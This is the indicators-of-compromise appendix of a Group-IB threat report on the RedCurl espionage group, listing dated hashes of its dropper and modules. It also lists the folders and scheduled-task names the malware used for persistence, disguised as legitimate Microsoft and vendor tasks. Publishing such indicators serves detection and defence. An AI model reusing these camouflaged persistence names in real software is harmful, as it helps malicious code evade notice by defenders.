**********\r\nSHA256: **********\r\n**********\r\nMD5: 973579883D19696C3B4286E74D8FA062\r\nSHA1: 3580DD6B213C6EFB86F6DFCD9A39EF850C47E503\r\nSHA256: 4DCB6F2DC401095B730FCFA50098E05C407C1AF2376AC2483EE1D\r\n813D6524CBE\r\nRedCurl.Dropper\r\nMD5: ecff12e894d75e21f86562cd76a9a102\r\nSHA1: b3dea7c6d31b4e1acf07befe2b937e545faa1172\r\nSHA256: 65c95bbd3cd3bd6b7bdbd05394a4cdb7fee2b2d43953bfbf23bf\r\n5fbd29412736\r\nEncrypted\r\nRedCurl.FSA\r\nMD5: b661d7367b778ba69941424d4bffbf09\r\nSHA1: 276b97c5805d932e19b5156e93d3054ca2403c58\r\nSHA256: 9ea46aa8cc4c26000b83ef445e296938fd81f2a322f7cde8a0220b4f\r\n20c0d973\r\nEncrypted\r\nRedCurl.C1\n\n40\r\n© GROUP−IB\r\nIoCs\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nDate Hashes Classification\r\n2019-08-14 MD5: 8b16f157d0f07819ada6896fed86d5d3\r\nSHA1: e10da81bf3b5d4864d6e339dff2aaf84b416f29e\r\nSHA256: 90583fa223fb3c5a86169e0f672266bbda3ddc8a4cc59662f58be00b\r\n313b0c72\r\nEncrypted\r\nRedCurl.C2\r\n2019-08-06 MD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: dcc0098c95e58a6bf95f0cfe70a4f476\r\nSHA1: 5e950dc125984ce19136d99dd87baaf943c3a8b7\r\nSHA256: 86b4e9a8a20ee49ae49df514ad768b12d4ebb042bb749eee19e6736a\r\n68554bac\r\nRedCurl.Dropper\r\nMD5: 78965056e42a035de01a7fc420d9bb97\r\nSHA1: e66f165ddb1c6bbf2e5c524e3ba6715dce0d0290\r\nSHA256: d3ea43eccbd1224b871d60c16b6ae0f67907c16fb8e81d14a494c96b\r\n615a6373\r\nEncrypted\r\nRedCurl.FSA\r\nMD5: 5e29db24d44311463fdeea35aa6cd61c\r\nSHA1: b359138e5a02a4ccdbb3526aa5351e44ee175352\r\nSHA256: c9b17f5f1a7e8513c1f1458989003f9bc126bbb1a1bb6ddace87050032\r\n9a5a56\r\nEncrypted\r\nRedCurl.C1\r\nMD5: b2ac2fad617b22f11b19bd24c50c4e8c\r\nSHA1: 3e684d2e3043c57b960343319c094ef7318bea5f\r\nSHA256: 71382a330a393b50d5a873f37fafb6ebad274d4aee006fcb321f1c8db1f\r\ne4fc3\r\nEncrypted\r\nRedCurl.C2\r\n2019-08-08 MD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: 78965056e42a035de01a7fc420d9bb97\r\nSHA1: e66f165ddb1c6bbf2e5c524e3ba6715dce0d0290\r\nSHA256: d3ea43eccbd1224b871d60c16b6ae0f67907c16fb8e81d14a494c96b\r\n615a6373\r\nEncrypted\r\nRedCurl.FSA\r\nMD5: 5e29db24d44311463fdeea35aa6cd61c\r\nSHA1: b359138e5a02a4ccdbb3526aa5351e44ee175352\r\nSHA256: c9b17f5f1a7e8513c1f1458989003f9bc126bbb1a1bb6ddace87050032\r\n9a5a56\r\nEncrypted\r\nRedCurl.C1\r\nMD5: b2ac2fad617b22f11b19bd24c50c4e8c\r\nSHA1: 3e684d2e3043c57b960343319c094ef7318bea5f\r\nSHA256: 71382a330a393b50d5a873f37fafb6ebad274d4aee006fcb321f1c8db1f\r\ne4fc3\r\nEncrypted\r\nRedCurl.C2\n\n41\r\n© GROUP−IB\r\nIoCs\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nDate Hashes Classification\r\n2019-09-12 MD5: e2d981da14863ab47345eb8534c8e3a1\r\nSHA1: 5bea907808d30369f60e7902a1b4906ded699897\r\nSHA256: 18e43031ee4ed50a773780e32e354ae5222988f675e3d51a1329df4\r\nf84d61578\r\nRedCurl.Dropper\r\nMD5: e315ea0ad5aa2556e4b0f68afe989acc\r\nSHA1: 3606849f0d6ec485579a8c6c136707e6c85ec473\r\nSHA256: 57441a44625855340c0bfdf1b6f5e69a520e4e3041064e3322b219a1b\r\n73cbbc2\r\nEncrypted\r\nRedCurl.FSA\r\nMD5: 04055917ce47645427b4f4ca84fe1e51\r\nSHA1: 21f23c97bb3d008baf5b276a847ede51efef8cc3\r\nSHA256: e75d03e6db53644e9d24838dd1c70d9f8687661fc850e6154dcd6\r\n6ebb0671333\r\nEncrypted\r\nRedCurl.C1\r\nMD5: dc8544751117ef6c0d320fbcd9e4a2db\r\nSHA1: f2e3d9700b0303cc1f57a7802b36420e79b25ce6\r\nSHA256: cd2f32ed533d4edba9874736f8eb3431042ec5af0674740b83c93af62\r\n3f5b0b8\r\nEncrypted\r\nRedCurl.C2\r\n2019-09-23 MD5: e7d27d0d682d8bb56b29b34e3eda03d7\r\nSHA1: ef8b6293111eb3fd2244307d95e8278b31778a78\r\nSHA256: c7df2c96c74e712cb3d33264f0f80140471b281c6fa7bbad313b74da048\r\nd828a\r\nRedCurl.Dropper\r\nMD5: f2e33472eb55f22a5c1eb1dd2dfdca8c\r\nSHA1: 1e82f8862e2d0884d20fbcd96d9d751c5924403e\r\nSHA256: 8842744141a91b8acda0ef7f7b2437049b14ada2887213f3d3eb5efff3cc\r\nccdc\r\nEncrypted\r\nRedCurl.FSA\r\nMD5: acb1882549b7556259bf7f25c7fbf077\r\nSHA1: aad0f1ce8cae3b0dd12f5a70f1ef495fd7269a1a\r\nSHA256: 9d405df68f1f017be0743a4db478d266b11cb804b4a6f5219f1caa67fe\r\n866a78\r\nEncrypted\r\nRedCurl.C1\r\nMD5: 7c0ec47f4b6acb597954b8f6befe33f1\r\nSHA1: 1644b15cdda74505f5a06ccbe1c5615db11f2558\r\nSHA256: 18d6e0d073a6cfa2ae882df7b9821b424043c92be304332dffe346aa2\r\n5225ba3\r\nEncrypted\r\nRedCurl.C2\r\n2019-09-24 MD5: 0bd8e164a95532bb2817bf2e056cc0f1\r\nSHA1: 403f8b0f9bb5e8a80651743ab274c63fa930c3bf\r\nSHA256: 3e143dfbc61ca565569cb5d997588da702f5b2a7293902695cab5237\r\n4cb4c7bf\r\nRedCurl.Dropper\r\nMD5: 553ee9ce533f0a103e644c6881eff81c\r\nSHA1: 1eb09787262722d8684db5c008066c9b69b15b94\r\nSHA256: 1d5a6fbc0514ae637cafd327aead8c01e000a8d9c80bd0be8faa21217\r\nb9ec412\r\nEncrypted\r\nRedCurl.FSA\r\nMD5: 774e762e8546c569328a1d550cd9479e\r\nSHA1: 0e8fe9dcfd88c89632f813227ecd9299455bec86\r\nSHA256: b4c8079dbe2a1b3d04f9656df1d47eaeecf3dbc4cb8eceaf71a8fbba54\r\n7cd2df\r\nEncrypted\r\nRedCurl.C1\n\n42\r\n© GROUP−IB\r\nIoCs\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nDate Hashes Classification\r\n2019-09-24 MD5: 313a8aad53478e141011934a3ead2ed6\r\nSHA1: f47a3e557813139b0202bb7e1bef7d1e5564f3d6\r\nSHA256: f5958605365175b6eb9da3544778b8e100cbebb3d2e1f9788d25df71d\r\n5394d2d\r\nEncrypted\r\nRedCurl.C2\r\n2019-10-15 MD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: 5050484c1f18d65059ff7e01dc162bf6\r\nSHA1: 3c34b35c9bf5e73cb702d6c2f7cbd96d2ee2f5cd\r\nSHA256: e77c4990b3863e789efc1b064a8387e7c71e74bc5f960045f64b5b1da\r\ndbfc213\r\nRedCurl.Dropper\r\nMD5: e3ac036fe4ac10813914b1cca52d1de5\r\nSHA1: 8711b71fda59b5b75176b436d2498d57c59d1389\r\nSHA256: b0b9fb1aaabf4a45e9f8dada75e7fee04aa61ead9432340bb9c5f92161\r\na6372d\r\nEncrypted\r\nRedCurl.FSA\r\nMD5: 36fb611a076da404f61ef667a12cac55\r\nSHA1: 36de37b3117e1f8e9df4749b2de886aef968511f\r\nSHA256: 3a4ab011bb5c5c24852ab21abe635f2969ac9452e354d22da1cbb793\r\nb63c3278\r\nEncrypted\r\nRedCurl.C1\r\nMD5: 868d9d2bd0d11843e5a381b1873508cb\r\nSHA1: b0eb8d3d80e503708a19a891b5ba11a9b55e54f6\r\nSHA256: b24955832b9fb277166535531773f52374f54bb7d6645687e4e03d0ce\r\na460f6d\r\nEncrypted\r\nRedCurl.C2\r\n2019-10-18 MD5: fe8dceacfbf2dc4d874359ef6fca2de1\r\nSHA1: 82ffae3656dfc3422462797bb3b21a0752f3dcbd\r\nSHA256: 34850b3ef6947fdae35523431690acb7da9543d209947ffb412307f1eb\r\na518ca\r\nRedCurl.Dropper\r\nMD5: 25f4359b5201295ac56dcf234800a3d9\r\nSHA1: 11c62b38f40faa6961be9ec2df8af1344c672233\r\nSHA256: 88caafdca263af4b7f6d6b952b16093b059cbcdb13ef26eabf096659d\r\ncb96e48\r\nEncrypted\r\nRedCurl.FSA\r\nMD5: e31512cb72b081f51e214f7d2496c0e1\r\nSHA1: 3a4ba61af6cbc627dd450ed74e58cdec3aee076d\r\nSHA256: 204d0bda0637e8a29970ce8123500cb7ff3d2c60d24a79ed4550f5c2\r\nc4a6d83e\r\nEncrypted\r\nRedCurl.C1\r\nMD5: 7086d00950105c9530bff7375b8464c3\r\nSHA1: 46e50da34773d0960dbedfb4598762b233725bbd\r\nSHA256: 4bd0943312cbf137da2286efd6e1892235d0cafe2b7472509c80cf5a2\r\nb90c8ff\r\nEncrypted\r\nRedCurl.C2\n\n43\r\n© GROUP−IB\r\nIoCs\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nDate Hashes Classification\r\n2019-12-20 MD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: 5f49e06a5a03f67eb476b66ab461f116\r\nSHA1: 0d0938ce0b6a2150ba3e02d231b9dafd5aeea69f\r\nSHA256: 4bef36d87e4a7f3e0f4fedacedb0f914c173e28718a413106de9972e2e2\r\n9cebf\r\nRedCurl.Dropper\r\nMD5: e2ce59cd2a36a5dfa2bc3ab8a8d9eca8\r\nSHA1: 25ec727de33683062e1e4afa11269fcaf61ea2b9\r\nSHA256: 10ab87fa526ff9d0458cc4ad51712cebd0733d56cb6475ca5434e7afe0\r\n7459c4\r\nEncrypted\r\nRedCurl.FSA\r\nMD5: 73340f09829b923c5a8c3468e166e49d\r\nSHA1: 2991873bd471a288379b2ddc3d03fa9a415e0eac\r\nSHA256: 2c10d7a916fddae6baaece992a1a12e2c76fa9da82e322b68aadd31c85\r\ndd48c7\r\nEncrypted\r\nRedCurl.C1\r\nMD5: c45df36255f57e31aeabd723e03bbd08\r\nSHA1: 4cb87f3d29b83620c96b67e4531120063438af01\r\nSHA256: 5aab509c14e9a6a63c4ca318d681be252bc406018d50f0b7b204bfb\r\nb63d73652\r\nEncrypted\r\nRedCurl.C2\r\n2020-02-20 MD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: 5e694e86bf0bc3e55f5a65d6684e1631\r\nSHA1: c47522b3923173881f52dddacd48acd88359f23a\r\nSHA256: ffc76831a7c5279ea1465f8f5f01a249052721a6618c8dc1ba68f3ea3d06\r\n2cce\r\nRedCurl.Dropper\r\nMD5: 2a5365dc4344c258196dfdba5d783db0\r\nSHA1: 0782da50a5ddf8551adc5957896a0406abc8ad16\r\nSHA256: d90d3d5c18bb8b9ba31be1a82fdbc7df4d37e7d05873e18843229\r\ne27b0501991\r\nEncrypted\r\nRedCurl.FSA\r\nMD5: 2d484bd4ea9e4d3853f0e91e062d980b\r\nSHA1: a31317e167c445fc09a2fb04a8eff66f038f921f\r\nSHA256: 7c99c0a7882da8d88c175ce4a34d2cac80bcdb7a2fa5f3815b0188554\r\n6b9e205\r\nEncrypted\r\nRedCurl.C1\n\n44\r\n© GROUP−IB\r\nIoCs\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nDate Hashes Classification\r\n2020-02-20 MD5: a1fa93c9650044ed71bbda18bdfe5f61\r\nSHA1: 19fd1b5c9d7f3f2ff9bad94381a2a4c19247dfd3\r\nSHA256: e5feb61cadf77531c1d424ea780deb54b802791bbd7bec640989468ff7f\r\n598af\r\nEncrypted\r\nRedCurl.C2\r\nMD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: c47104f9c669454e7b48d2c717d949da\r\nSHA1: edfc60a54fda49fa43a6e0d8ed5a14e181278617\r\nSHA256: 5bfb89aa7b1014a239733f04c5c93d8ff3835d68c9ed12cd87e5a2f700\r\nc2ad43\r\nRedCurl.Dropper\r\nMD5: 808f2e36caaa5c2e88c29cf0e634e2bb\r\nSHA1: 84051063cf4e11cef9ec8c3ce81d4a2a4b36348f\r\nSHA256: 0313e9c6db0d200fc52cf45444d7f0b4e2415091a09f11c77d93ff0ca5f\r\n466c5\r\nEncrypted\r\nRedCurl.FSA\r\nMD5: 1c3a60db0b174963dd01953c55804411\r\nSHA1: ccc8176dd2cc0d7831d153f9d9399b4712e6da5b\r\nSHA256: 03ffd05b057f837ca6a110ad6ee3c3abaf240e4b28ba6a161dad824dfe\r\n9f86aa\r\nEncrypted\r\nRedCurl.C1\r\nMD5: 04a1c0704b549581e3029634ea2ecf07\r\nSHA1: 6343000188465aa07d92639f812f7fccf0ed56cf\r\nSHA256: 95d95e0df11486a4ac675dadad541848435327a1f9eed331bba808179\r\n821d740\r\nEncrypted\r\nRedCurl.C2\r\nMD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: 47db515e537b88184f450bd352cb7e6e\r\nSHA1: d9d6001515073a6fda28958f5990091733662e17\r\nSHA256: 4cff712afedaf492ffc01c1d96d0ec3fa08e7a361787fd97971313a8d20\r\n1ebe1\r\nRedCurl.Dropper\r\nMD5: 65693ff4d81af47db2974ade7db857e0\r\nSHA1: 2dd90d341d80edef4fbee339c856caec3001056f\r\nSHA256: e29ccda7507adc5479d4413c9486b2217b4c2e415be5f03259540359\r\nd7b2c6aa\r\nEncrypted\r\nRedCurl.FSA\r\nMD5: 24b5427d7e147de61d6b2b535aa1028f\r\nSHA1: ff054cc435c8007f3238bee5ab40b95675ee8208\r\nSHA256: cfabe2d5bee9367fd7a8a6882c3ab0fbd897520e44ce67cc40d60b02\r\nf8f19d04\r\nEncrypted\r\nRedCurl.C1\r\nMD5: a3d0c95a34ebf46b313c26ea7ca79288\r\nSHA1: 7bef4606d73bd77b8d1d5b6b7a08f8869190d49d\r\nSHA256: f66c8d0fdc5d436a5c284d36d36cfe3cc7e1f7efcca5a7274a58bf1cd5f\r\nfd4b8\r\nEncrypted\r\nRedCurl.C2\n\n45\r\n© GROUP−IB\r\nIoCs\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nDate Hashes Classification\r\n2020-01-21 MD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: 95a5fba13ae88e43f460c9fba7328670\r\nSHA1: 47dc335be7c9c114c6061fd72b8b76cf87e63e72\r\nSHA256: 10558d1be5fcaf108240ebe1f8a53ecb0c4acc82e7f3ab6885b00dc102\r\n9b7fcf\r\nEncrypted\r\nRedCurl.FSA\r\nMD5: 4fff5bd6c746139406279f764504cd9c\r\nSHA1: 2f7581666f5a7ccc6afa3a1ac7cc1994f78a7ae2\r\nSHA256: 4f984cf3589903887f0b221b1db5ef7c47e7bce9568a5a8070aea8f42f\r\nb31fe9\r\nEncrypted\r\nRedCurl.C1\r\nMD5: d3de39a4482cfa3f051f418a10e1994e\r\nSHA1: 91210c365e4ceaaef5aeb595f30c53d573a27943\r\nSHA256: d4a7943abb06b42b731c22bb8fd5c49fb714dcac11cbeca1e81c5781f62\r\nff5b6\r\nEncrypted\r\nRedCurl.C2\r\n2020-03-25 MD5: 082f4383801b79279e82b718c672a452\r\nSHA1: ce178c77370e9654c810c5a67fa55d2e0bd0a7f4\r\nSHA256: 24b6308438b081c77338a917b907d57a3f5519b6008167e6c1b3d9d02\r\ncd4a38a\r\nEncrypted\r\nRedCurl.FSA\r\nMD5: a75871000b944b87fa0aee37cb20facf\r\nSHA1: c25194f9c547a85a9ce7a7dd752427b33a16c0e7\r\nSHA256: 15417751a35972f2e54123e97440a8acf24c26bbd9d8521cc88fb7498\r\nb54b567\r\nEncrypted\r\nRedCurl.C1\r\nMD5: e000ab9fa0bf5e01ba353bba14fac8f1\r\nSHA1: 51d60a7da40c11e37b31462e6b78f909e84d85f4\r\nSHA256: 22d9328d4e9da55db54576ab52eb6837c20bf034e045e5f078b00e7\r\n7c362aeff\r\nEncrypted\r\nRedCurl.C2\r\n2020-07-06 MD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: 12ec7e6876dc86f158f448ebfba9e0eb\r\nSHA1: 464a8c086279357ad41e15180ae0d4881cf48717\r\nSHA256: 5388a22c42c360937e422df0f4336c48003fbf72aa87bb1f4107de900\r\n59dc04d\r\nRedCurl.Dropper\n\n46\r\n© GROUP−IB\r\nIoCs\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nDate Hashes Classification\r\n2020-07-06 MD5: 65167ef2ac035b8205e657a31b3c8ee5\r\nSHA1: aa21dc970461c653bd24e75a1440f6893bbaf747\r\nSHA256: df621643336947405b6f0d66927730a51267c39b6978ac732f9dc7941\r\n7fba464\r\nEncrypted\r\nRedCurl.FSA\r\nMD5: cda007d68777e193827ab87cb00c4726\r\nSHA1: 25a3d8aacc4bb40fd3a42ab7fa80c180324ac90b\r\nSHA256: 7476fe7f7750f5fcc2eeb66b3626377957f0a1e92d621cb4db2352b659\r\n5722c7\r\nEncrypted\r\nRedCurl.C1\r\nMD5: 12ec7e6876dc86f158f448ebfba9e0eb\r\nSHA1: 464a8c086279357ad41e15180ae0d4881cf48717\r\nSHA256: 5388a22c42c360937e422df0f4336c48003fbf72aa87bb1f4107de900\r\n59dc04d\r\nEncrypted\r\nRedCurl.C2\r\n2020-07-10 MD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: 1a0b622c4f2805b601655f7ffe0dabf6\r\nSHA1: 8fc49c58aeb70943da579e6985b64d78a56f6958\r\nSHA256: 61f981e15bae9b0643262f16a124cb490f51d0040267d41e17c6b83f2b9\r\nd437c\r\nRedCurl.Dropper\r\nMD5: 4071bf66e07cd4a7feadd316f91cfd56\r\nSHA1: b9c762e7e65b4cdcac054fa424b2219f8ecf3b78\r\nSHA256: edfa39f931ec45f71a4b6cc6b473f046a384f1f05637a1eb0a5a4c1608c\r\n044cf\r\nEncrypted\r\nRedCurl.FSA\r\nMD5: db602ed8ba5890f162dc3546847646b1\r\nSHA1: 7fee558c6d6668e67e75dd94a2d7609c287ec756\r\nSHA256: 7bdd5815e2fbe8ff71897dc0f56a980d9931731f4bcc45ea7782545debb\r\n556d7\r\nEncrypted\r\nRedCurl.C1\r\nMD5: f04cf464ddd719dce94640cc4b6e866d\r\nSHA1: 19d0afc92e3e98e3ed5e1db9aed21da791245e8d\r\nSHA256: 660f8efbf3f5e408092ead5933bcb80bd220d91d3233ec162ebf725fd\r\n0bc82f6\r\nEncrypted\r\nRedCurl.C2\r\n2020-07-14 MD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\n2020-07-14 MD5: 979eaebd1510996ab834e3471fdaab5b\r\nSHA1: 23e813e43dc67b50a7d00f76223c1fc56fe1abbe\r\nSHA256: bba4e8a3f2a05d5bb543b765c7964e33ba02e8a895bfc64976f6ae9\r\n412a99464\r\nRedCurl.Dropper\n\n47\r\n© GROUP−IB\r\nIoCs\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nDate Hashes Classification\r\nMD5: 040cb066f2cdfc579c9be86128ceb8ff\r\nSHA1: b1a79cce4a75e46830f52fedc67b2a3209eb78bb\r\nSHA256: 016b42c3f7f1c3bffbec2228994ca36397f5e0f5c26132c297bae7e5dd7\r\n87da4\r\nEncrypted\r\nRedCurl.FSA\r\nMD5: b5d0f72dc1bda1727d88c51cf16ee8c1\r\nSHA1: 729c83d7986eca76536e3b318233945a7febaff8\r\nSHA256: cf2b96927b6f3bf3bb169200e047b6337a256012f350b6f5b5b8bec37\r\n100f951\r\nEncrypted\r\nRedCurl.C1\r\nMD5: 662493e155284d654d61e2923efeeec4\r\nSHA1: 09bd864389edcc7585a42950e32619c31b1ac34a\r\nSHA256: 2c69410c0d45561d286b67f7848811b551dd659d62fef7cb1711875d3c1c\r\n0a3a\r\nEncrypted\r\nRedCurl.C2\r\nMD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nMD5: **********\r\nSHA1: **********\r\nSHA256: **********\r\n**********\r\nPath\r\nDate Path\r\n2018-06-11 / 2018-07-04 %LOCALAPPDATA%\\Microsoft\\Control\r\n%APPDATA%\\Microsoft\\Check\r\n%APPDATA%\\Firefox\\Update\r\n%LOCALAPPDATA%\\Microsoft\\Control\\tmp\\1\r\n%LOCALAPPDATA%\\Microsoft\\Control\\tmp\\2\r\n2018-07-18 %APPDATA%\\Microsoft\\Check\r\n%APPDATA%\\Firefox\\Update\r\n2018-12-01 %APPDATA%\\MSSched\\\r\n2019-07-02 %LOCALAPPDATA%\\Microsoft\\DiskDiagnosticSrv\r\n%APPDATA%\\gbtregmainsrva\r\n%APPDATA%\\Microsoft\\regdevpchk\r\n2019-07-10 %LOCALAPPDATA%\\Microsoft\\NetworkStateChangeTask\r\n%APPDATA%\\PowerEfficiencyDiagnosticsF\r\n%APPDATA%\\Microsoft\\EduPrintProvf\r\n2019-07-18 %LOCALAPPDATA%\\Microsoft\\ControlLocalTimeSvc\r\n%APPDATA%\\RealtekNetDrvCheckHostA\r\n%APPDATA%\\Microsoft\\IntelWirelessHostB\n\n48\r\n© GROUP−IB\r\nIoCs\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nDate Path\r\n2019-07-25 %LOCALAPPDATA%\\Microsoft\\CleanupTemporaryStates\r\n%APPDATA%\\ADRMSRightsPolicyTemplate\r\n%APPDATA%\\Microsoft\\VerifiedPublishersCertsStoreCheck\r\n2019-07-30 %LOCALAPPDATA%\\Microsoft\\WsSwapAssessmentTaskF\\\r\n%APPDATA%\\IndexerAutomaticMaintenanceF»\r\n%APPDATA%\\Microsoft\\EnableLicenseAcquisitionS\r\n2019-07-31 %LOCALAPPDATA%\\Microsoft\\msftavchecka\r\n%APPDATA%\\SystemSoundsServiceb\r\n%APPDATA%\\Microsoft\\HybridDriveCacheRebalancec\r\n2019-08-14 %LOCALAPPDATA%\\NetworkStateChangeTask\r\n%APPDATA%\\PowerEfficiencyDiagnosticsF\r\n%APPDATA%\\Microsoft\\EduPrintProvf\r\n2019-08-06 %LOCALAPPDATA%\\Microsoft\\CalibrationLoaderU\r\n%APPDATA%\\MsCtfMonitorFrameworkH\r\n%APPDATA%\\Microsoft\\QueueReportingErrorM\r\n2019-08-08 %LOCALAPPDATA%\\Microsoft\\CalibrationLoaderU\r\n%APPDATA%\\MsCtfMonitorFrameworkH\r\n%APPDATA%\\Microsoft\\QueueReportingErrorM\r\n2019-09-12 %LOCALAPPDATA%\\Microsoft\\PropertyDefinition\r\n%APPDATA%\\UsbCeipCons\r\n%APPDATA%\\Microsoft\\MDMMaintenenceProgram\r\n2019-09-23 %LOCALAPPDATA%\\Microsoft\\GeneralizeDrivers\r\n%APPDATA%\\WorkFolders\r\n%APPDATA%\\Microsoft\\PCMobilityManager\r\n2019-09-24 %LOCALAPPDATA%\\Microsoft\\\\DevicesSettings\r\n%APPDATA%\\CertServicesServer\r\n%APPDATA%\\Microsoft\\DDClient\r\n2019-10-15 %LOCALAPPDATA%\\Microsoft\\VerifyRecoveryWinRE\r\n%APPDATA%\\HPComp\r\n%APPDATA%\\Microsoft\\drwats64oauthb\r\n2019-10-18 %LOCALAPPDATA%\\Microsoft\\DiskDiagnosticData\r\n%APPDATA%\\AikCertEnrollTask\r\n%APPDATA%\\Microsoft\\DataIntegrity\r\n2019-11-27 %LOCALAPPDATA%\\Microsoft\\MSSharepointProducts\r\n%APPDATA%\\Microsoft\\MSSMConf\r\n%APPDATA%\\CTXWorkflowStudio\r\n2019-12-20 %LOCALAPPDATA%\\Microsoft\\MemoryDiagnosticService\r\n%APPDATA%\\BitLockerMgr\r\n%APPDATA%\\Microsoft\\DiagSvcMgr\n\n49\r\n© GROUP−IB\r\nIoCs\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nDate Path\r\n2020-02-20 %LOCALAPPDATA%\\Microsoft\\SvcRestartTaskNetworkSrv\r\n%APPDATA%\\Microsoft\\ResolutionHostc\r\n%APPDATA%\\UPnPHostConfServb\r\n%LOCALAPPDATA%\\Microsoft\\SetSyncSvc\r\n%APPDATA%\\MSEntmgmt\r\n%APPDATA%\\Microsoft\\PTI\r\n%LOCALAPPDATA%\\Microsoft\\SpaceManagerSrv\r\n%APPDATA%\\DiskDiagnosticData\r\n%APPDATA%Microsoft\\SoftwareProtectionService\r\n2020-01-21 %LOCALAPPDATA%\\Microsoft\\OrchestratorUpd\r\n%APPDATA%\\RegSVR\\\r\n%APPDATA%\\Microsoft\\MSCTFSvc\r\n2020-03-25 %LOCALAPPDATA%\\Microsoft\\WinActDiag\r\n%APPDATA%\\Microsoft\\EnterpriseManagement\\\r\n%APPDATA%\\ADRMSManagement\r\n2020-07-06 %LOCALAPPDATA%\\DeviceDirectoryC\r\n%APPDATA%\\AppxDepCltn\r\n%APPDATA%\\Microsoft\\CUAssist\r\n2020-07-10 %LOCALAPPDATA%\\DirectXUSR\r\n%APPDATA%\\Microsoft\\CloudExperience\r\n%APPDATA\\CertificateServ\r\n2020-07-14 %LOCALAPPDATA%\\servcomptm\r\n%APPDATA%\\Microsoft\\WindowsActionDialog\r\n%APPDATA%\\AppID\r\nTasks\r\nDate Task\r\n2018-06-11 / 2018-07-04 Microsoft Windows Check Updates Status\r\nCheckTN1\r\n2018-07-18 CheckU3\r\nCheckTN1\r\n2019-07-02 DiskDiagnosticResolverSrv\r\nDeviceDirectoryCltServ\\RegisterDeviceProtectionStateCheck\r\nBrokerInfraService\\BgTaskRegistrationMaintenanceSrv\r\n2019-07-10 NetworkStateChangeTaskProv\r\nPrintingProvEdu\\EduPrintProvTask\r\nPowerEfficiencyDiagnostics\\PowerEfficiencyDiagnosticsTask\r\n2019-07-18 ControlLocalTimeSvc\r\nINTELW\\IntelWirelessHost\r\nRealtekNetDrvCheck\\RealtekNetDrvCheckHost\n\n50\r\n© GROUP−IB\r\nIoCs\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nDate Task\r\n2019-07-25 CleanupTemporaryStateTask\r\nVerifiedPublishersCerts\\VerifiedPublishersCertsStoreCheck\r\nADRMSRightsPolicyTemplates\\ADRMSRightsPolicyTemplateSrv\r\n2019-07-30 WsSwapAssessmentTask\r\nLicenseAcquisitionService\\EnableLicenseAcquisitionTask\r\nIndexerAutomaticMaintenance\\IndexerAutomaticMaintenanceTask\r\n2019-07-31 SynaMonAppService\r\nCertStore\\VerifiedPublisherCertStoreCheckBkp\r\nOfficeSupport\\OfficeTelemetryAgentLogOnSrv\r\n2019-08-14 PowerEfficiencyDiagnostics\r\nNetworkStateChangeTaskProv\r\nPrintingProvEdu\\EduPrintProvTask\r\n2019-08-06 CalibrationLoaderTask\r\nErrorReportingFramework\\QueueReportingError\r\nTextServices\\MsCtfMonitorFramework\r\n2019-08-08 CalibrationLoaderTask\r\nQueueReportingError\r\nMsCtfMonitorFramework\r\n2019-09-12 PropertyDefinitionSync_ + Base64(%USERNAME%)\r\nMDMEnterpriseMgmt\\MDMMaintenence_ + Base64(%USERNAME%)\r\nCustomerExperienceImprovementProgram\\UsbCeipConsolidator_ +\r\nBase64(%USERNAME%)\r\n2019.09.23 SysprepGeneralizeDrivers_ + Base64(%USERNAME%)\r\nRas\\PCMobilityManager_ + Base64(%USERNAME%)\r\nWorkFolders\\WorkFoldersLogonSynchronization_ + Base64(%USERNAME%)\r\n2019-09-24 RegisterDeviceSettingsChange_ + Base64(%USERNAME%)\r\nDriveDirectoryClient\\LocateCommandUserSessionTask_ +\r\nBase64(%USERNAME%)\r\nCertificateServicesServer\\KeyPreGenerTask_ + Base64(%USERNAME%)\r\n2019-10-15 HPComputers\\WakeUpAndScanForUpdates_ + Base64(%USERNAME%)\r\nVerifyRecoveryWinRE_ + Base64(%USERNAME%)\r\nMSFTSysSoundsServices\\SysSoundsServices_ + Base64(%USERNAME%)\r\n2019-10-18 Microsoft-Windows-DiskDiagnosticDataCollector_ + Base64(%USERNAME%)\r\nCertificateServicesClient\\AikCertEnrollTask_ + Base64(%USERNAME%)\r\nDataIntegrityScan\\DataIntegrityScan_ + Base64(%USERNAME%)\r\n2019-11-27 MicrosoftSharePointProducts_ + Base64(%USERNAME%)\r\nMS-ShareMapConfiguration\\ComPartitionSets_ + Base64(%USERNAME%)\r\nCitrix\\WorkflowStudio_ + Base64(%USERNAME%)\r\n2019-12-20 ProcessMemoryDiagnosticEvents_ + Base64(%USERNAME%)\r\nScheduled_ + Base64(%USERNAME%)\r\nBitLockerMDMpolicyRefresh_ 